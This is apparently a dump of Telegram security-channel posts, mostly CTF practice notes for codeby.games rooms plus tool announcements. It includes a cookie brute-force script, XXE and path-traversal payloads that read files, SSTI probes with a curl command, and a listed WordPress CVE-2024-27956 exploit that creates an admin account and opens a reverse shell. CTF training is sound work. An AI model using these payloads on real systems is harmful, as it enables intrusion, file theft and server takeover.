Forwarded from Cat Seclist
#ScanPro - NMap Scanning Scripts
ScanPro Menu
[1] Target Selection
[2] Port Selection
[3] Scan Types
[4] Service and Operating System Detection
[5] Output formats
[6] NSE Scripting
[7] HTTP info gathering
[m] Main Menu
https://github.com/Anlominus/ScanPro
ScanPro Menu
[1] Target Selection
[2] Port Selection
[3] Scan Types
[4] Service and Operating System Detection
[5] Output formats
[6] NSE Scripting
[7] HTTP info gathering
[m] Main Menu
https://github.com/Anlominus/ScanPro
codeby.games room: Cookie Jar
Cookie Bruter:
#Preparation #For #CTF
Cookie Bruter:
import requests
s = requests.Session()
i=0
for i in range(129):
i+=1
r=s.get('TARGET_IP:PORT', cookies={'id': str(i)})
print(r.text)
#Preparation #For #CTF
codeby.games room: Broken box
Vulnerable Type: XXE Injection
Payload:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag.txt" > ]>
<svg width="200px" height="200px" xmlns="https://www.w3.org/2000/svg" xmlns:xlink="https://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
#Preparation #For #CTF
Vulnerable Type: XXE Injection
Payload:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag.txt" > ]>
<svg width="200px" height="200px" xmlns="https://www.w3.org/2000/svg" xmlns:xlink="https://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
#Preparation #For #CTF
🔥1
Forwarded from Cat Seclist
Hackyx - A cybersecurity search engine for IT security resources like #CTF writeups and #BugBounty reports.
» https://hackyx.io/
» https://hackyx.io/
🔥1
Forwarded from Cat Seclist
Hi everyone checkout the new tool Dnsbruter which is an asynchronous Dns brutforcing and Fuzzing tool to brutforce and get subdomains which can handle high loads wordlist, threads etc with custome resolvers which will be a new replacing tool for puredns to not crash your network anymore, to install the Dnsbruter see here: https://github.com/RevoltSecurities/Dnsbruter
codeby.games room: Regular page
Vulnerable Type: LFI
Simple payload: /../../../../flag.txt
#Preparation #For #CTF
Vulnerable Type: LFI
Simple payload: /../../../../flag.txt
#Preparation #For #CTF
🔥1
codeby.games room: Congratulations application
Vulnerable Type: SSTI
Payload: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2---dump-all-config-variables —> {{config.items()}}
Discover SSTI with curl: curl -g 'https://example.com:PORT/{{7*7}}'
#Preparation #For #CTF
Vulnerable Type: SSTI
Payload: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2---dump-all-config-variables —> {{config.items()}}
Discover SSTI with curl: curl -g 'https://example.com:PORT/{{7*7}}'
#Preparation #For #CTF
🔥1
Forwarded from Cat Seclist
WordPress_Auto_Admin_Account_and_Reverse_Shell_cve_2024_27956.zip
3 KB
cve-2024-27956
*
WordPress Auto Admin Account Creation and Reverse Shell.
*
Дырка в плагине wp-automatic для выполнения SQL-запросов.
#wordpress
*
WordPress Auto Admin Account Creation and Reverse Shell.
*
Дырка в плагине wp-automatic для выполнения SQL-запросов.
#wordpress
TUIT_CTF ning birinchi bosqichi yakunlandi. Jamoamiz bilan 5-o'rinni egallab, 2-bosqichga yo'l oldik. 2-bosiqich 23-may kuni offline shaklda bo'lib o'tadi.
#CTF #Scoreboard
#CTF #Scoreboard
🔥5
Forwarded from Codeby
ШХ. Подоборка инструментов для OSINT
Приветствую всех читателей статьи! Сегодня будет очередная подборка различных инструментов, которые будут являться довольно неплохим дополнение к арсеналу любого кибер-разведчика по открытым источникам.
📌 Читать статью
#osint #software
Приветствую всех читателей статьи! Сегодня будет очередная подборка различных инструментов, которые будут являться довольно неплохим дополнение к арсеналу любого кибер-разведчика по открытым источникам.
📌 Читать статью
#osint #software